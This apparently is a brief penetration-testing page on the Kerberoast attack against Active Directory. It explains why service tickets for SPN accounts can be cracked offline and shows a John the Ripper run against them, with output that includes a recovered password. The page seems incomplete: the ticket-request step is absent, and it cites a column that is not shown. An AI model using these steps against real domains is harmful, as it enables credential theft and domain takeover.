This page deals with compromising Active Directory with Kerberoast attack.
Introduction
For several reasons, it is very common in Active Directory environments to find services launched with domain administrator accounts. A Service Principal Name (SPN) associates a service and the user who launched it.
Any domain user is allowed to request a ticket for a service and locally crack it to retrieve the cleartext password of the domain administrator who launched the service.
If the attack is successful, the attacker compromise the Active Directory domain.
uberuser belongs to Domain Admins group (cf. MemberOf column).
Crack Tickets
First, install MagnumRipper version of John The Ripper which supports KRB5TGS format.
Then crack Tickets to obtain cleartext passwords:
root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123 ($krb5tgs$unkown)
ASDqwe123 ($krb5tgs$unkown)
It is an efficient way to compromise domain admin password and consequently Active Directory domain.
